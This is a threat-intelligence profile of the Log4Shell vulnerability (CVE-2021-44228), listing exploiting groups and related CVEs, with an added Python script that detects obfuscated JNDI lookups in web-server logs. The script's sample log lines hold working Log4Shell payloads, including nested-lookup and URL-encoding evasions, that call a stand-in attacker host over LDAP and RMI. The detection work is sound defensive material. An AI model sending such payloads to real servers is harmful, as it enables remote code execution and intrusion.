CVE-2021-44228

Vulnerability updated 3 months ago (2024-08-14T09:36:36.482Z)
CVE-2021-44228, also known as Log4Shell, is a critical remote code execution flaw in Apache's Log4j 2 logging library. Disclosed in December 2021, it quickly became one of the most severe bugs of recent years because of how widely Log4j is embedded in other software and how easy the flaw is to exploit. Several Advanced Persistent Threat (APT) actors attempted to exploit it in systems such as ServiceDesk without success, while other groups, among them GOLD MELODY (UNC961), used it to gain access to servers such as MobileIron Core. Log4Shell has since been used by a range of threat groups, including APT40, which is known for rapidly exploiting newly public vulnerabilities in widely used software; besides Log4j, that group has targeted Atlassian Confluence and Microsoft Exchange. TellYouThePass, a ransomware group active since 2019, has also exploited this vulnerability along with flaws in other open-source web development technologies. Years after disclosure, CVE-2021-44228 remains one of the most commonly attempted exploits, particularly against educational institutions, where it accounts for 74% of observed exploit attempts; LockBit was responsible for 30% of the ransomware incidents against the education sector that used this exploit. The vulnerability continues to interest both defenders and attackers, which underlines the need for continued vigilance and prompt patching of known vulnerabilities.
Description last updated: 2024-08-14T09:06:03.754Z
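Because exploit attempts against CVE-2021-44228 are still common, the first practical check for a defender is whether such attempts show up in their own web-server logs. The Python script below is an added example, not code from this page or from the Apache Log4j project: it normalises the lookup obfuscations that Log4j 2 would itself resolve before reaching JNDI (`${lower:x}`, `${upper:x}`, `${date:'x'}`, the `:-default` fallback form, and URL-encoding of the whole payload) and then looks for the resulting `${jndi:...}` expression. The access-log lines are constructed samples using documentation-range addresses, and the `normalize`, `find_jndi` and `scan` names are the example's own, not a library API.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit attempts in web-server access
logs, including the obfuscated forms attackers use to hide the ${jndi:...}
lookup from naive string matching.

Added example, not the page's or the Log4j project's code. Coverage of
evasion tricks is illustrative (the forms listed below), not exhaustive.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no nested "${", "{" or "}".
INNERMOST = re.compile(r'\$\{([^${}]*)\}')
# What we ultimately look for once the obfuscation has been collapsed.
JNDI = re.compile(r'\$\{\s*jndi:[^}]*\}?', re.IGNORECASE)
# Lookup keys are case-insensitive in Log4j 2's Interpolator.
CASE_LOOKUP = re.compile(r'(lower|upper):(.*)', re.IGNORECASE | re.DOTALL)
DATE_LITERAL = re.compile(r"date:'([^']*)'", re.IGNORECASE)


def _eval_lookup(body: str) -> str:
    """Resolve one innermost lookup the way Log4j 2 would, for the subset of
    lookups attackers use to assemble the literal token "jndi"."""
    if body.lower().startswith('jndi:'):
        return '${' + body + '}'          # keep the target intact for matching
    if ':-' in body:                      # ${name:-default} and ${::-x} -> default
        return body.split(':-', 1)[1]
    m = CASE_LOOKUP.fullmatch(body)
    if m:                                 # ${lower:J} -> j, ${upper:j} -> J
        text = m.group(2)
        return text.lower() if m.group(1).lower() == 'lower' else text.upper()
    m = DATE_LITERAL.fullmatch(body)
    if m:                                 # ${date:'j'} -> j (quoted literal)
        return m.group(1)
    return ''                             # env/sys/etc.: not resolvable offline


def normalize(line: str, max_rounds: int = 64) -> str:
    """URL-decode (twice, to catch double encoding) and collapse nested
    lookups from the inside out until the string stops changing."""
    line = unquote(unquote(line))
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: _eval_lookup(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def find_jndi(line: str):
    """Return the normalised ${jndi:...} expression, or None if absent."""
    m = JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan(lines):
    """Return (index, jndi_expression) for every line carrying an attempt."""
    hits = []
    for i, line in enumerate(lines):
        expr = find_jndi(line)
        if expr:
            hits.append((i, expr))
    return hits


# Constructed sample access-log lines (Apache combined format); the payload
# sits in the User-Agent field, the most common injection point in 2021.
_PREFIX = '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
SAMPLE_LOGS = [
    _PREFIX + '"${jndi:ldap://203.0.113.7:1389/a}"',                 # plain
    _PREFIX + '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.7/a}"',
    _PREFIX + '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    _PREFIX + '"%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fz%7D"',       # URL-encoded
    _PREFIX + '"${env:NOPE:-${jndi:rmi://203.0.113.7/Exploit}}"',    # hidden in a default
    _PREFIX + '"Mozilla/5.0 (X11; Linux x86_64)"',                    # benign
    _PREFIX + '"${date:yyyy}-report"',                                 # benign lookup
]

if __name__ == '__main__':
    for idx, expr in scan(SAMPLE_LOGS):
        print(f'line {idx}: Log4Shell attempt -> {expr}')
```

Run against real logs one line at a time; the point of the inside-out rewrite is that a signature for the literal string `jndi:` misses every sample except the first, whereas the normalised form is the same expression Log4j would have evaluated. Unresolvable lookups such as `${env:...}` collapse to an empty string, which is a deliberate simplification: a real environment variable could supply part of the token, so treat any unexpected `${...}` in a request header as suspicious even when this check does not fire.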
Possible Aliases / Cluster overlaps
Vendors track cluster overlaps and naming conventions differently, so these are possible overlapping names or profiles that may also be relevant.
Log4Shell (11 votes)
Log4Shell is a possible alias for CVE-2021-44228. Log4Shell is a critical vulnerability in the Log4j Java-based logging library; the name refers to CVE-2021-44228 and is often extended to cover the follow-on issues CVE-2021-45046 and CVE-2021-45105 that were found while fixing it. It was exploited by various threat actors, including LockBit affiliates and GOLD MELODY (UNC961), to gain unauthorized
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Log4j
Vulnerability
Exploit
Remote Code ...
Exploits
RCE (Remote ...
Apt
exploited
Ransomware
Confluence
Operation Bl...
Malware
Apache
Ofbiz
Associated Threat Actors
APT40 (association type: Unspecified; 2 votes)
The APT40 Threat Actor is associated with CVE-2021-44228. APT40, a threat actor attributed to China, is a cyber espionage group that primarily targets countries of strategic importance to the Belt and Road Initiative. The group is known for its use of a variety of attack vectors, notably spear-phishing emails posing as individuals likely to be of interest
APT41 (association type: Unspecified; 2 votes)
The APT41 Threat Actor is associated with CVE-2021-44228. APT41, also known as Winnti, is a threat actor suspected to be operating from China, with activity dating back to at least 2012. It has targeted organizations in at least 14 countries and has been associated with the use of at least 46 different code families and tools. The group's activi
Associated Vulnerabilities
CVE-2021-34473 (association type: Unspecified; 3 votes)
The CVE-2021-34473 Vulnerability is associated with CVE-2021-44228. CVE-2021-34473 is a significant software vulnerability discovered in Microsoft Exchange Server. Together with two others (CVE-2021-31207 and CVE-2021-34523) it forms the chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to
CVE-2021-26084 (association type: Unspecified; 3 votes)
The CVE-2021-26084 Vulnerability is associated with CVE-2021-44228. CVE-2021-26084 is a critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center. Atlassian publicly disclosed it in August 2021, and it was being exploited in the wild within days of the advisory. It allowed remote attackers to execute code on a Confluence Server via injection atta
CVE-2021-34523 (association type: Unspecified; 2 votes)
The vulnerability CVE-2021-34523 is associated with CVE-2021-44228. It is a Microsoft Exchange Server elevation-of-privilege flaw and the third member of the ProxyShell chain alongside CVE-2021-34473 and CVE-2021-31207.
CVE-2021-44207 (association type: Unspecified; 2 votes)
The CVE-2021-44207 Vulnerability is associated with CVE-2021-44228. CVE-2021-44207 is a significant software vulnerability that was exploited by APT41, a prolific Chinese state-sponsored espionage group known for targeting both public and private sector organizations. This flaw in the USAHerds web application's design or implementation mirrors a previously reported
ProxyShell (association type: Unspecified; 2 votes)
The ProxyShell Vulnerability is associated with CVE-2021-44228. ProxyShell is a chain of vulnerabilities affecting Microsoft Exchange email servers that poses a significant risk to organizations worldwide. It allows attackers to gain unauthorized access to the server. Since early 2021, Iranian government-sponsored APT ac
CVE-2021-31207 (association type: Unspecified; 2 votes)
The CVE-2021-31207 Vulnerability is associated with CVE-2021-44228. CVE-2021-31207 is a Microsoft Exchange Server vulnerability, one of the three flaws chained in ProxyShell, that has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software. The same group has also targeted Atlassian Confluence and Log4j, among other platforms, and a
Source Document References
Information about the CVE-2021-44228 Vulnerability was read from the documents corpus below. This display is limited to 20 results.
Source | Created At
CISA | 6 days ago
BankInfoSecurity | 21 days ago
CERT-EU | 10 months ago
DARKReading | 4 months ago
CISA | 4 months ago
Securityaffairs | 4 months ago
CISA | 4 months ago
Securityaffairs | 5 months ago
DARKReading | 5 months ago
InfoSecurity-magazine | 6 months ago
DARKReading | 8 months ago
CERT-EU | 9 months ago
CERT-EU | 9 months ago
CERT-EU | 9 months ago
CERT-EU | 9 months ago
CERT-EU | 9 months ago
BankInfoSecurity | 10 months ago
Securityaffairs | 10 months ago
CERT-EU | 10 months ago
CERT-EU | 10 months ago